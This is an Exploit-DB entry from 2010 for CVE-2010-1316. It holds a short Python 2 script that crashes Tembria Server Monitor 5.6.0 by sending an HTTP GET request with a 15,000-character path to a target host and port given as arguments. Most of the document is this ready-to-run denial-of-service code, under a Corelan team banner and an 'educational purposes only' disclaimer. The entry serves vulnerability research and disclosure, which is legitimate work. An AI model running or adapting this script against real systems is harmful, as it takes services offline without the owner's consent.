Tembria Server Monitor 5.6.0 - Denial of Service

EDB-ID:

12131

Author:

Lincoln

Type:

dos

Platform:

Windows

Published:

2010-04-09

#!/usr/bin/python
# Exploit Title : Tembria Server Monitor 5.6.0
# CVE-ID        : CVE-2010-1316
# Date          : April 9, 2010
# Author        : Lincoln
# Software Link : http://www.tembria.com/
# Version       : 5.6.0
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : Remote DoS
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                                                  |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "\n[+] Exploit for Tembria Server Monitor 5.6.0"

import socket,sys

#usage ./filename.py IP PORT

host = sys.argv[1]
port = int(sys.argv[2]) #80

buf = "GET /tembria/index.asp/"  + "B" * 15000  + " A" + " HTTP/1.1\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "[+] DoS packet sent!\n"
s.send(buf)
s.close()